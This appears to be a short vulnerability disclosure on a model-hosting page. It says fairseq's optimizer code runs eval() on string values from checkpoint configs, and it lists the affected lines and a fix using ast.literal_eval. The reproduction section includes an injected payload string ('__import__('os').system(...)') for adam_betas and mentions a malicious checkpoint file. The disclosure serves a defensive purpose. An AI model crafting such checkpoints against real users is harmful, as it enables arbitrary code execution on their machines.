fairseq eval() Config RCE PoC
Vulnerability
fairseq optimizer implementations call eval() on string config values
from checkpoints. A malicious checkpoint with crafted adam_betas achieves
arbitrary code execution when training is resumed.
Affected Code
fairseq/optim/adam.py:91-eval(self.cfg.adam_betas)fairseq/optim/adamax.py:42-eval(self.args.adamax_betas)fairseq/optim/cpu_adam.py:78-eval(self.cfg.adam_betas)fairseq/optim/fused_lamb.py:44-eval(self.args.lamb_betas)fairseq/optim/adafactor.py:55-eval(self.args.adafactor_eps)
Files
malicious_checkpoint.pt- Checkpoint with eval-exploitable adam_betaspoc_fairseq_eval_rce.py- Standalone PoC script
Reproduction
import torch
state = torch.load("malicious_checkpoint.pt", weights_only=False)
adam_betas = state["cfg"]["optimization"]["adam_betas"]
# adam_betas = "__import__('os').system('echo RCE')"
eval(adam_betas) # This is what fairseq does at adam.py:91
Fix
Replace eval() with ast.literal_eval() in all 5 optimizer files.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support